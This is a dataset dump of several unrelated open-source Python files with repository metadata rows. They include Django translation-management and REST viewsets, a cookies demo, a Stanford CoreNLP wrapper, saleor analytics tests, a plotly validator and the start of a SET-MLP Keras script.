    files for the language, copies them into the project-wide locale
    directory (``settings.LOCALE_PATHS[0]``) under an ``<app>-`` prefix,
    merges them into one ``django.po``/``djangojs.po`` per domain,
    compiles the result and resets the in-process translation cache.
    """

    template_name = 'admin/includes/translation_messages_list.html'

    def get(self, request, *args, **kwargs):
        # Only meant to be called over Ajax by authorized translators.
        if not request.is_ajax():
            raise Http404
        if not request.user.has_perm('translations.edit_translations'):
            raise PermissionDenied

        try:
            self.language = Language.objects.get(name=args[0])
            self.locale = to_locale(self.language.name)
        except Language.DoesNotExist:
            raise Http404

        if settings.LOCALE_PATHS:
            # Check if the folder for this language exists and attempt
            # to create it if it does not exist.
            self.po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
            if not os.path.exists(self.po_path):
                try:
                    os.makedirs(self.po_path)
                except:  # any makedirs failure is reported via self.error
                    self.error = _('Could not create the target folder.')
        else:
            self.error = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')

        # Delete existing catalog files if requested.
        # NOTE(review): when LOCALE_PATHS is empty, self.po_path is never
        # set and a '?delete=1' request would raise AttributeError here —
        # confirm whether callers guarantee LOCALE_PATHS is configured.
        if request.GET.get('delete', 0):
            for f in os.listdir(self.po_path):
                if f.endswith('.po') or f.endswith('.mo'):
                    os.unlink(os.path.join(self.po_path, f))

        context = self.get_context_data(**kwargs)
        return self.render_to_response(context)

    def get_context_data(self, **kwargs):
        context = super(GenerateTranslationMessagesView, self).get_context_data(**kwargs)

        if hasattr(self, 'error') and self.error:
            context['error'] = self.error
            return context

        # Locate the current directory (restored after each chdir below).
        curr_dir = os.curdir
        # gettext domain -> template extensions scanned by makemessages.
        domain_dict = {'django' : ['html','txt'], 'djangojs' : ['js']}
        lang_files = []

        # Iterate over the installed applications and copy their po files
        # for this language to the appropriate folder.
        for app_name in settings.INSTALLED_APPS:
            mod = import_module(app_name)
            mod_root = os.path.dirname(mod.__file__)

            if not os.path.exists(os.path.join(mod_root, 'locale')):
                continue

            original_path = os.path.join(mod_root, 'locale', to_locale(self.language.name), 'LC_MESSAGES')
            delete_at_the_end = False

            if not os.path.exists(original_path):
                if not app_name.startswith('django.contrib'):
                    try: # try to create the language directory for the app
                        os.makedirs(original_path)
                        delete_at_the_end = True
                    except:  # app directory not writable: skip this app
                        continue
                else:
                    continue

            if not app_name.startswith('django.contrib'):
                # Back up the app's original .po files under an
                # 'original-' prefix so they can be restored afterwards.
                for file_ in list(os.listdir(original_path)):
                    if file_.endswith('.po'):
                        shutil.copy(os.path.join(original_path, file_), os.path.join(original_path, 'original-%s' % file_))

                # Copy the project-wide files into the app directory so
                # makemessages updates the yawd-managed version rather
                # than the app's pristine one.
                if not self.request.GET.get('delete', 0):
                    for f in list(os.listdir(self.po_path)):
                        if f.startswith('%s-' % app_name) and f.endswith('.po'):
                            shutil.copy(os.path.join(self.po_path, f), os.path.join(original_path, f.replace('%s-' % app_name, '')))

                # Run makemessages for non-core apps only; the command is
                # cwd-sensitive, hence the chdir dance.
                os.chdir(mod_root)
                for key, value in domain_dict.items():
                    make_messages(locale=self.locale, domain=key, extensions=handle_extensions(value), verbosity=0)
                os.chdir(curr_dir)

            # Collect the application's po files into the unified folder.
            for file_ in list(os.listdir(original_path)):
                if not file_.startswith('original-') and file_.endswith('.po'):
                    original_file_path = os.path.join(original_path, file_)
                    file_name = '%s-%s' % (app_name, file_)

                    # Copy the file; django.contrib catalogs are copied
                    # only once (or on an explicit delete/regenerate).
                    copy_path = os.path.join(self.po_path, file_name)
                    if self.request.GET.get('delete', 0) or not (app_name.startswith('django.contrib') and os.path.exists(copy_path)):
                        shutil.copy(original_file_path, copy_path)
                        os.chmod(copy_path, 0664)  # Python-2 octal literal (0o664)

                    # Remove the temporary updated file from the app tree.
                    if not app_name.startswith('django.contrib'):
                        os.unlink(original_file_path)

                    lang_files.append(file_name)

            if not app_name.startswith('django.contrib'):
                if delete_at_the_end:
                    # The language directory was created above only for
                    # this run: clean it up entirely.
                    shutil.rmtree(os.path.join(mod_root, 'locale', to_locale(self.language.name)))
                else:
                    # Put back the original application files.
                    for file_ in os.listdir(original_path):
                        if file_.startswith('original-') and file_.endswith('.po'):
                            shutil.move(os.path.join(original_path, file_), os.path.join(original_path, file_.replace('original-','')))

        # Concatenate all messages into a single .po file per domain.
        for domain in domain_dict:
            file_name = '%s.po' % domain
            uni_django_path = os.path.join(self.po_path, file_name)

            if os.path.exists(uni_django_path):
                os.unlink(uni_django_path)

            source_files = [os.path.join(self.po_path, f) for f in lang_files if f.endswith(file_name)]
            if source_files:
                # Merge the per-app .po files.
                concat_message_files(source_files, uni_django_path)
                # Compile, skipping files with a BOM — mirrors the
                # has_bom guard used by Django's compilemessages command.
                if not has_bom(uni_django_path):
                    compile_message_file(uni_django_path)

        # Reset the cached translation messages so that
        # we do not need to restart the web server.
        reset_translations(self.language.name)

        context['lang_files'] = sorted(lang_files)
        return context
class TranslationMessagesView(TemplateView):
    """Admin page listing the per-application .po files available for a
    language so the user can pick one to translate."""

    template_name = 'admin/translation_messages.html'

    def get(self, request, *args, **kwargs):
        # Viewing translations requires an explicit permission.
        if not request.user.has_perm('translations.view_translations'):
            raise PermissionDenied

        try:
            self.language = Language.objects.get(name=args[0])
        except Language.DoesNotExist:
            raise Http404
        self.locale = to_locale(self.language.name)

        return self.render_to_response(self.get_context_data(**kwargs))

    def get_context_data(self, **kwargs):
        context = super(TranslationMessagesView, self).get_context_data(**kwargs)

        language = self.language
        opts = language._meta
        change_perm = opts.app_label + '.' + opts.get_change_permission()
        user = self.request.user

        context.update({
            'title': _('Translate Static Messages'),
            'language': language,
            'opts': opts,
            # Model-level and object-level change permissions.
            'has_change_permission': user.has_perm(change_perm),
            'has_change_object_permission': user.has_perm(change_perm, language.pk),
        })

        if not settings.LOCALE_PATHS:
            context['error'] = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')
            return context

        po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
        if os.path.exists(po_path):
            # Per-app catalogs only; the merged django/djangojs files are
            # excluded from the listing.
            found = sorted(f for f in os.listdir(po_path)
                           if f.endswith('.po') and f not in ('django.po', 'djangojs.po'))
        else:
            found = []
        context['lang_files'] = found

        # No directory or no catalogs both mean "nothing generated yet".
        if not found:
            context['warning'] = _('The system does not appear to have any translation messages for this language. Please use the "Generate messages" button.')
        return context
class TranslationMessagesEditView(FormView):
    """Admin view that lets a privileged user edit one .po file of a
    language, then rebuilds and recompiles the merged catalog for the
    corresponding gettext domain.

    Fixes over the previous revision: file handles are managed with
    ``with`` blocks (they used to leak on read/write errors) and the two
    bare ``except:`` clauses were narrowed so that system-exiting
    exceptions (KeyboardInterrupt, SystemExit) are no longer swallowed.
    """
    template_name = 'admin/edit_translation_messages.html'
    form_class = PoFileForm
    success_url = '../'

    def dispatch(self, request, *args, **kwargs):
        """
        Overridden dispatch method to check if user has the right to edit
        the .po file.
        """
        if not request.user.has_perm('translations.edit_translations'):
            raise PermissionDenied
        return super(TranslationMessagesEditView, self).dispatch(request, *args, **kwargs)

    def get_initial(self):
        """
        Attempt to load the .po file and put its contents in the form's
        initial data.

        Raises Http404 when the language, the LOCALE_PATHS setting or the
        requested file is missing/unreadable.
        """
        try:
            self.language = Language.objects.get(name=self.args[0])
        except Language.DoesNotExist:
            raise Http404
        if settings.LOCALE_PATHS:
            # Folder holding this language's catalogs, e.g. locale/de/LC_MESSAGES
            self.po_path = os.path.join(settings.LOCALE_PATHS[0], to_locale(self.language.name), 'LC_MESSAGES')
        else:
            raise Http404
        self.po_file = self.args[1]
        try:
            # Context manager guarantees the handle is closed even if read fails.
            with open(os.path.join(self.po_path, self.po_file), 'r') as file_:
                contents = file_.read()
            return { 'po_content' : contents }
        except (IOError, OSError):
            # Missing or unreadable file -> behave like a non-existent page.
            raise Http404

    def get_context_data(self, **kwargs):
        context = super(TranslationMessagesEditView, self).get_context_data(**kwargs)
        opts = self.language._meta
        context['title'] = u'%s %s' % (_('Edit'), self.po_file)
        context['language'] = self.language
        context['opts'] = opts
        # add permission context variables consumed by the admin template
        context['has_delete_permission'] = False
        context['has_add_permission'] = False
        context['has_change_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
        context['has_change_object_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission(), self.language.pk)
        context['change'] = True
        context['is_popup'] = False
        context['save_as'] = False
        return context

    def form_valid(self, form):
        """Persist the edited catalog, rebuild the merged domain file,
        recompile it and reset the in-process translation cache."""
        try:
            file_path = os.path.join(self.po_path, self.po_file)
            with open(file_path, 'w+') as file_:
                file_.write(smart_str(form.cleaned_data['po_content']))
            # The merged catalog name depends on the gettext domain of the
            # edited file ('djangojs.po' does NOT end with 'django.po').
            domain = 'django.po' if self.po_file.endswith('django.po') else 'djangojs.po'
            uni_django_path = os.path.join(self.po_path, domain)
            source_files = []
            # Iterate over the installed applications, locate & concat
            # the corresponding per-app django.po or djangojs.po file.
            for app_name in settings.INSTALLED_APPS:
                local_django = os.path.join(self.po_path, '%s-%s' % (app_name, domain))
                if os.path.exists(local_django):
                    source_files.append(local_django)
            concat_message_files(source_files, uni_django_path)
            if not has_bom(uni_django_path):
                compile_message_file(uni_django_path)
            # Reset the cached translation messages so that
            # we do not need to restart the web server.
            reset_translations(self.language.name)
            messages.add_message(self.request, messages.SUCCESS, _(('The file %(file)s was succesfuly updated.' % { 'file' : self.po_file })))
        except Exception:
            # Any failure along the pipeline is reported to the user; we
            # deliberately keep the page usable instead of erroring out.
            messages.add_message(self.request, messages.ERROR, _(('The file %(file)s could not be saved.' % { 'file' : self.po_file })))
        # save and continue editing
        if "_continue" in self.request.POST:
            return HttpResponseRedirect('../%s' % self.po_file)
        return super(TranslationMessagesEditView, self).form_valid(form)
| [
"[email protected]"
]
| |
71bc398215f05023c66de7b67055c6c4452211b3 | 71dfa5d568d408fd8464a1313f87c1133e3d061c | /ATS/urls.py | b3d6e11901bbb899f6983c3d21e1d181763c2df1 | []
| no_license | harshdonga/Alumni-Tracking-System | 3819e26e82145ca2cf277c1f260494cb6a6fbd4c | f0c836d5fb405f8b61fb73d78acc4c47802a9c11 | refs/heads/master | 2020-12-29T17:48:13.989148 | 2020-02-07T04:27:59 | 2020-02-07T04:27:59 | 238,687,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | from django.contrib import admin
from django.urls import path, include
# Project-level URL routing: the Django admin plus all routes of the
# `alumni` application mounted at the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('alumni.urls')),
]
| [
"[email protected]"
]
| |
5c107d3057995ffc314bc3eebe9f4fdb39227a36 | 321e58ab3e6b2385bb3549aaaefd56a58c2a51e7 | /python/atpic/atcookies.py | 1d2ea4668a4d530a17d2d2233e73e24b0279454c | []
| no_license | alexmadon/atpic_photosharing | 7829118d032344bd9a67818cd50e2c27a228d028 | 9fdddeb78548dadf946b1951aea0d0632e979156 | refs/heads/master | 2020-06-02T15:00:29.282979 | 2017-06-12T17:09:52 | 2017-06-12T17:09:52 | 94,095,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # cookies libary to process
# lang, format, resolution, wiki
# file:///home/madon/doc/python-3.3a0-docs-html/library/http.cookies.html
from http import cookies
# Example 1: build a cookie with two morsels and print the full
# "Set-Cookie:" header block.
C = cookies.SimpleCookie()
C["fig"] = "newton"
C["sugar"] = "wafer"
print(C)
# Example 2: a morsel with an attribute ("path") and the various ways a
# morsel can be rendered (value, coded value, header string...).
C = cookies.SimpleCookie()
C["rocky"] = "road"
C["rocky"]["path"] = "/cookie"
print(C.output(header="Cookie:"))
print(C["rocky"].value)
print(C.output(header=''))
print(dir(C["rocky"]))
print(C["rocky"].values())
print(C["rocky"].output())
print(C["rocky"].coded_value)
print(C["rocky"].OutputString())
# Example 3: parse an incoming "Cookie:" header string into morsels.
C = cookies.SimpleCookie()
C.load("chips=ahoy; vienna=finger")
print(C.keys())
| [
"[email protected]"
]
| |
ff3179806be417683f17da0629967ff753f5acd1 | c06d18ac5b87b3b82fc486454c422b119d6c1ee9 | /src/demo/NLPBook/chapter5/stanford.py | e7a74651d98ea5d99c3a6e7fc528c3f3e51716fd | []
| no_license | tangermi/nlp | b3a4c9612e6049463bf12bc9abb7aff06a084ace | aa36b8b20e8c91807be73a252ff7799789514302 | refs/heads/master | 2022-12-09T12:33:15.009413 | 2020-04-03T04:03:24 | 2020-04-03T04:03:24 | 252,056,010 | 0 | 0 | null | 2022-12-08T07:26:55 | 2020-04-01T02:55:05 | Jupyter Notebook | UTF-8 | Python | false | false | 2,411 | py | # -*- coding: utf-8 -*-
import sys
import os
# CoreNLP 3.6 jar包和中文模型包
# ejml-0.23.jar
# javax.json.jar
# jollyday.jar
# joda-time.jar
# jollyday.jar
# protobuf.jar
# slf4j-api.jar
# slf4j-simple.jar
# stanford-corenlp-3.6.0.jar
# xom.jar
class StanfordCoreNLP(object):
    """Thin wrapper around the Stanford CoreNLP 3.6 command line tools.

    Builds the Java classpath from a directory of CoreNLP jars and offers
    small helpers for writing/removing the temporary input file that the
    command line tools read.
    """
    def __init__(self,jarpath):
        # Directory containing the CoreNLP jars; must end with the path
        # separator (e.g. "C:/corenlp/") since jar names are appended raw.
        self.root = jarpath
        self.tempsrcpath = "tempsrc"  # path of the temporary input file
        self.jarlist = ["ejml-0.23.jar","javax.json.jar","jollyday.jar","joda-time.jar","protobuf.jar","slf4j-api.jar","slf4j-simple.jar","stanford-corenlp-3.6.0.jar","xom.jar"]
        self.jarpath = ""
        self.buildjars()
    def buildjars(self):
        """Build the ';'-separated Java classpath from root + jar names."""
        for jar in self.jarlist:
            self.jarpath += self.root+jar+";"
    def savefile(self,path,sent):
        """Write *sent* to *path* in binary mode.

        Uses a context manager so the handle is closed even if the write
        raises (the previous open/close pair leaked on error).
        """
        with open(path,"wb") as fp:
            fp.write(sent)
    def delfile(self,path):
        """Remove the temporary file at *path*."""
        os.remove(path)
class StanfordPOSTagger(StanfordCoreNLP):
    """Part-of-speech tagger driving the Stanford MaxentTagger via java.

    Fixes over the previous revision: ``tagfile`` referenced an undefined
    variable ``sent`` (a guaranteed NameError on every call), and the
    Python-2 ``print`` statements were converted to calls so the module
    is importable under Python 3.
    """
    def __init__(self,jarpath,modelpath):
        StanfordCoreNLP.__init__(self,jarpath)
        self.modelpath = modelpath  # path of the trained tagger model
        self.classfier = "edu.stanford.nlp.tagger.maxent.MaxentTagger"
        self.delimiter = "/"  # separator between token and tag in output
        self.__buildcmd()
    def __buildcmd(self):
        """Build the java command line used for tagging."""
        self.cmdline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -model "'+self.modelpath+'" -tagSeparator '+self.delimiter
    def tag(self,sent):
        """Tag a single sentence: write it to the temp file, run the
        tagger on it and return the tagged text."""
        self.savefile(self.tempsrcpath,sent)
        tagtxt = os.popen(self.cmdline+" -textFile "+self.tempsrcpath,'r').read()  # run the tagger
        self.delfile(self.tempsrcpath)
        return tagtxt
    def tagfile(self,inputpath,outpath):
        """Tag a whole text file, writing the result to *outpath*.

        The previous version wrote an undefined variable ``sent`` to the
        temp file (NameError); the command reads *inputpath* directly, so
        no temporary file is needed at all.
        """
        os.system(self.cmdline+' -textFile '+inputpath+' > '+outpath )
    def __buildprop(self):
        """Build the command line that dumps a default properties file."""
        self.propline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -genprops'
    def genpropfile(self,propath):
        """Write the tagger's default training properties to *propath*."""
        self.__buildprop()
        propfile = os.popen(self.propline,'r').read()
        self.savefile(propath,propfile)
        print("save properties to " + propath)
    def __buildtrain(self,propspath):
        """Build the command line that trains a model from *propspath*."""
        self.trainline = 'java -mx4g -cp "'+self.jarpath+'" '+self.classfier +' -props "'+propspath+'"'
    def trainmodel(self,propspath):
        """Train a new tagger model using the given properties file."""
        self.__buildtrain(propspath)
        os.system(self.trainline)
        print("save model to model.tagger")
| [
"[email protected]"
]
| |
8a16091fafc3f2319884a057c8e434ab0e79a775 | 7759c0ad152fe9c369b074a24601e54806b0afa8 | /backend/event/api/v1/viewsets.py | 4cba77ae5ad9f884a97fa17647488092f6c46aa1 | []
| no_license | crowdbotics-apps/covidcheck-15163 | be59f495e31b50948725fb332429751749f9b611 | a2f80fc2541bbc069cf3ec6a7f4d740aa665c77b | refs/heads/master | 2023-02-08T22:01:35.813215 | 2020-03-29T16:50:54 | 2020-03-29T16:50:54 | 250,877,575 | 0 | 0 | null | 2023-01-24T01:47:09 | 2020-03-28T19:33:39 | JavaScript | UTF-8 | Python | false | false | 3,066 | py | from rest_framework import authentication
from event.models import (
Category,
Faq,
Favorites,
Location,
MySchedule,
Presenter,
Schedule,
Sponsor,
Vendor,
VendorDetail,
)
from .serializers import (
CategorySerializer,
FaqSerializer,
FavoritesSerializer,
LocationSerializer,
MyScheduleSerializer,
PresenterSerializer,
ScheduleSerializer,
SponsorSerializer,
VendorSerializer,
VendorDetailSerializer,
)
from rest_framework import viewsets
# Boilerplate DRF CRUD endpoints for the event app. Every viewset exposes
# the full ModelViewSet action set (list/retrieve/create/update/destroy)
# over its model, authenticated via session or token.
class MyScheduleViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for MySchedule objects.
    serializer_class = MyScheduleSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = MySchedule.objects.all()
class CategoryViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Category objects.
    serializer_class = CategorySerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Category.objects.all()
class LocationViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Location objects.
    serializer_class = LocationSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Location.objects.all()
class PresenterViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Presenter objects.
    serializer_class = PresenterSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Presenter.objects.all()
class VendorViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Vendor objects.
    serializer_class = VendorSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Vendor.objects.all()
class FaqViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Faq objects.
    serializer_class = FaqSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Faq.objects.all()
class ScheduleViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Schedule objects.
    serializer_class = ScheduleSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Schedule.objects.all()
class SponsorViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Sponsor objects.
    serializer_class = SponsorSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Sponsor.objects.all()
class VendorDetailViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for VendorDetail objects.
    serializer_class = VendorDetailSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = VendorDetail.objects.all()
class FavoritesViewSet(viewsets.ModelViewSet):
    # CRUD endpoint for Favorites objects.
    serializer_class = FavoritesSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Favorites.objects.all()
| [
"[email protected]"
]
| |
9b3e528238dee10f5bdee6ca543158322d95ff6a | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/scattergl/_xsrc.py | 2c107c6b510e42d803ee235a58aa1eabf4f21690 | [
"MIT"
]
| permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 386 | py | import _plotly_utils.basevalidators
class XsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="xsrc", parent_name="scattergl", **kwargs):
super(XsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
| [
"[email protected]"
]
| |
4aa11ff5954703255ef2662ebc7538a8a164e33c | 0eb6c70503c680ebec415016ff1b0cfac92486ca | /lincdm/views/sitemap.py | f33aa93f833be7422fb0e7b0f58bb61365b8d717 | []
| no_license | alexliyu/lincdm | c8b473946f59aca9145b3291890635474f144583 | eab93285f0b03217ea041a7910edae7e00095cd8 | refs/heads/master | 2020-12-30T10:50:05.248988 | 2011-08-09T15:52:38 | 2011-08-09T15:52:38 | 1,464,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | """Views for entry sitemap"""
from django.views.generic.simple import direct_to_template
from lincdm.entry.models import Entry
from lincdm.entry.models import Category
def sitemap(*args, **kwargs):
    """Delegate to the ``direct_to_template`` generic view while forcing
    ``extra_context`` to hold all published entries and the category tree."""
    extra = {
        'entries': Entry.published.all(),
        'categories': Category.tree.all(),
    }
    kwargs['extra_context'] = extra
    return direct_to_template(*args, **kwargs)
| [
"[email protected]"
]
| |
e7102e8a75f1b70c301e29ea4054d292404bf23c | 709bd5f2ecc69a340da85f6aed67af4d0603177e | /tests/test_analytics.py | d6818e163a670b22b8bcf46edc578302d57d81ae | [
"BSD-3-Clause"
]
| permissive | Kenstogram/opensale | 41c869ee004d195bd191a1a28bf582cc6fbb3c00 | 5102f461fa90f2eeb13b9a0a94ef9cb86bd3a3ba | refs/heads/master | 2022-12-15T02:48:48.810025 | 2020-03-10T02:55:10 | 2020-03-10T02:55:10 | 163,656,395 | 8 | 0 | BSD-3-Clause | 2022-12-08T01:31:09 | 2018-12-31T09:30:41 | Python | UTF-8 | Python | false | false | 1,647 | py | from decimal import Decimal
from saleor.core.analytics import (
get_order_payloads, get_view_payloads, report_order, report_view)
def test_get_order_payloads(order_with_lines):
    """The GA e-commerce payload must contain one transaction record plus
    one item record per order line (order_with_lines is a pytest fixture)."""
    order = order_with_lines
    generator = get_order_payloads(order)
    data = list(generator)
    # one transaction payload + one payload per line
    assert len(data) == order.lines.count() + 1
    # first payload is the transaction itself ('ti' = transaction id, etc.)
    transaction = data[0]
    assert transaction['ti'] == order.pk
    assert transaction['cu'] == order.total.currency
    assert Decimal(transaction['tr']) == order.total.gross.amount
    assert Decimal(transaction['tt']) == order.total.tax.amount
    assert Decimal(transaction['ts']) == order.shipping_price.net.amount
    # remaining payloads describe the individual order lines
    for i, line in enumerate(order):
        item = data[i + 1]
        assert item['ti'] == order.pk
        assert item['in'] == line.product_name
        assert item['ic'] == line.product_sku
        assert item['iq'] == str(int(line.quantity))
        assert item['cu'] == line.unit_price.currency
        assert Decimal(item['ip']) == line.unit_price.gross.amount
def test_report_order_has_no_errors(order_with_lines):
    """Smoke test: reporting an order with an empty tracking id must not raise."""
    report_order('', order_with_lines)
def test_get_view_payloads():
    """Pageview payload must map path/host/referer/language to the GA keys
    dp/dh/dr/ul."""
    headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
    generator = get_view_payloads('/test-path/', 'en-us', headers)
    data = list(generator)[0]
    assert data['dp'] == '/test-path/'
    assert data['dh'] == 'getsaleor.com'
    assert data['dr'] == 'example.com'
    assert data['ul'] == 'en-us'
def test_report_view_has_no_errors():
    """Smoke test: reporting a pageview with an empty tracking id must not raise."""
    headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
    report_view('', '/test-path/', 'en-us', headers)
| [
"[email protected]"
]
| |
51a44f03eb696ececa3a9e650a63d3177d62f625 | 976a21364b7c54e7bccddf1c9deec74577ce8bb8 | /build/rob_control/catkin_generated/pkg.develspace.context.pc.py | ae505c4d62a69cc0f460001a4541d25f31f1d6e7 | []
| no_license | jinweikim/catkin_ws | f0168b17c04863a6e5472f6199a4a9c525e0f3aa | 268ce7e348a162019e90d0e4527de4c9140ac0f8 | refs/heads/master | 2023-01-02T17:23:06.834527 | 2020-10-23T12:03:49 | 2020-10-23T12:03:49 | 262,527,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "actionlib_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rob_control"
PROJECT_SPACE_DIR = "/home/jinwei/catkin_ws/devel"
PROJECT_VERSION = "0.0.0"
| [
"[email protected]"
]
| |
fbca50ebf0262d7c137ebc41118f7bd0b71c47de | 674649dc02390c4a60b9c62b586b81d405969047 | /network/__init__.py | 19f1226938b882bcbc77dc6b13f7782a531efc6f | []
| no_license | weijiawu/Pytorch_Classification | 709513be3e019a896ef11a1739829a97bb99c9db | 7609a1d809590c1423f4ed0ee1f0d918954355a9 | refs/heads/master | 2022-12-06T00:51:26.716590 | 2020-09-01T07:38:22 | 2020-09-01T07:38:22 | 285,811,133 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,252 | py | from __future__ import absolute_import
"""The models subpackage contains definitions for the following model for CIFAR10/CIFAR100
architectures:
- `AlexNet`_
- `VGG`_
- `ResNet`_
- `SqueezeNet`_
- `DenseNet`_
You can construct a model with random weights by calling its constructor:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18()
alexnet = models.alexnet()
squeezenet = models.squeezenet1_0()
densenet = models.densenet_161()
We provide pre-trained models for the ResNet variants and AlexNet, using the
PyTorch :mod:`torch.utils.model_zoo`. These can constructed by passing
``pretrained=True``:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18(pretrained=True)
alexnet = models.alexnet(pretrained=True)
ImageNet 1-crop error rates (224x224)
======================== ============= =============
Network Top-1 error Top-5 error
======================== ============= =============
ResNet-18 30.24 10.92
ResNet-34 26.70 8.58
ResNet-50 23.85 7.13
ResNet-101 22.63 6.44
ResNet-152 21.69 5.94
Inception v3 22.55 6.44
AlexNet 43.45 20.91
VGG-11 30.98 11.37
VGG-13 30.07 10.75
VGG-16 28.41 9.62
VGG-19 27.62 9.12
SqueezeNet 1.0 41.90 19.58
SqueezeNet 1.1 41.81 19.38
Densenet-121 25.35 7.83
Densenet-169 24.00 7.00
Densenet-201 22.80 6.43
Densenet-161 22.35 6.20
======================== ============= =============
.. _AlexNet: https://arxiv.org/abs/1404.5997
.. _VGG: https://arxiv.org/abs/1409.1556
.. _ResNet: https://arxiv.org/abs/1512.03385
.. _SqueezeNet: https://arxiv.org/abs/1602.07360
.. _DenseNet: https://arxiv.org/abs/1608.06993
"""
# from .alexnet import *
# from .vgg import *
# from .resnet import *
# from .resnext import *
# from .wrn import *
# from .preresnet import *
# from .densenet import * | [
"[email protected]"
]
| |
2b6b9fdb0f744756e2cee975230f11c0238b45ea | 31a928cff4960236923b6bc3b68e34bb2f46f470 | /sparse-evolutionary-artificial-neural-networks/SET-MLP-Keras-Weights-Mask/set_mlp_keras_cifar10.py | 1a61f24283ff805b0be5792da50162cb6b2a6831 | [
"BSD-3-Clause",
"MIT"
]
| permissive | webclinic017/ml_monorepo | 707df2afd2f986eb0721d26430e6135c917817c6 | 945f0a83d6b94282c547bb6f4805f3381ad9c16a | refs/heads/master | 2021-10-19T21:02:53.322944 | 2019-02-19T20:58:51 | 2019-02-23T20:06:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,286 | py | # Author: Decebal Constantin Mocanu et al.;
# Proof of concept implementation of Sparse Evolutionary Training (SET) of Multi Layer Perceptron (MLP) on CIFAR10 using Keras and a mask over weights.
# This implementation can be used to test SET in varying conditions, using the Keras framework versatility, e.g. various optimizers, activation layers, tensorflow
# Also it can be easily adapted for Convolutional Neural Networks or other models which have dense layers
# However, due the fact that the weights are stored in the standard Keras format (dense matrices), this implementation can not scale properly.
# If you would like to build and SET-MLP with over 100000 neurons, please use the pure Python implementation from the folder "SET-MLP-Sparse-Python-Data-Structures"
# This is a pre-alpha free software and was tested with Python 3.5.2, Keras 2.1.3, Keras_Contrib 0.0.2, Tensorflow 1.5.0, Numpy 1.14;
# The code is distributed in the hope that it may be useful, but WITHOUT ANY WARRANTIES; The use of this software is entirely at the user's own risk;
# For an easy understanding of the code functionality please read the following articles.
# If you use parts of this code please cite the following articles:
#@article{Mocanu2018SET,
# author = {Mocanu, Decebal Constantin and Mocanu, Elena and Stone, Peter and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio},
# journal = {Nature Communications},
# title = {Scalable Training of Artificial Neural Networks with Adaptive Sparse Connectivity inspired by Network Science},
# year = {2018},
# doi = {10.1038/s41467-018-04316-3}
#}
#@Article{Mocanu2016XBM,
#author="Mocanu, Decebal Constantin and Mocanu, Elena and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio",
#title="A topological insight into restricted Boltzmann machines",
#journal="Machine Learning",
#year="2016",
#volume="104",
#number="2",
#pages="243--270",
#doi="10.1007/s10994-016-5570-z",
#url="https://doi.org/10.1007/s10994-016-5570-z"
#}
#@phdthesis{Mocanu2017PhDthesis,
#title = "Network computations in artificial intelligence",
